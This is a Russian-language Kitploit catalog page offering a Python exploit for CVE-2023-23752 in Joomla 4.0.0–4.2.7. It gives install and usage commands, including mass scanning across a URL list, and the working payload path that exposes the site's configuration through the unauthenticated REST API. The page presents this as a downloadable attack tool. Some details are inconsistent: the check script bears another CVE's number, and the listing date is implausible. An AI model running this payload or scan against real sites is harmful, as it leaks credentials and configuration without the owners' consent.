Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-23752 — Эксплойт на Python для CVE-2023-23752, нацеленный на Joomla 4.0.0-4.2.7, предоставляет несанкционированный доступ к REST API, позволяя раскрывать конфиденциальную информацию с помощью специально сформированных полезных нагрузок. | Kitploit
Инструменты/GitHubGitHub/ytxzx/cve-2023-23752
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubytxzx/cve-2023-23752

CVE-2023-23752

Эксплойт на Python для CVE-2023-23752, нацеленный на Joomla 4.0.0-4.2.7, предоставляет несанкционированный доступ к REST API, позволяя раскрывать конфиденциальную информацию с помощью специально сформированных полезных нагрузок.

Репозиторий
12 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-23752 - Воспроизведение уязвимости неавторизованного доступа в Joomla

Использование скрипта

Установка библиотек Python

pip install -r requirements.txt

Проверка уязвимости

python3 CVE-2022-26134_check.py -u url -c whoami

изображение

Массовое сканирование

python3 CVE-2023-23752.py -f url_part.txt

изображение

Затронутые версии

4.0.0 <= Joomla <= 4.2.7

Воспроизведение уязвимости

payload:

/api/index.php/v1/config/application?public=true

Перейдите по уязвимому адресу, перехватите пакет, повторите отправку пакета.

изображение

Принцип уязвимости

В Joomla! CMS версии 4.0.0–4.2.7 из-за неправильного ограничения доступа к конечным точкам веб-служб возможен неавторизованный доступ к REST API, что приводит к утечке конфиденциальной информации.

Скачать инструмент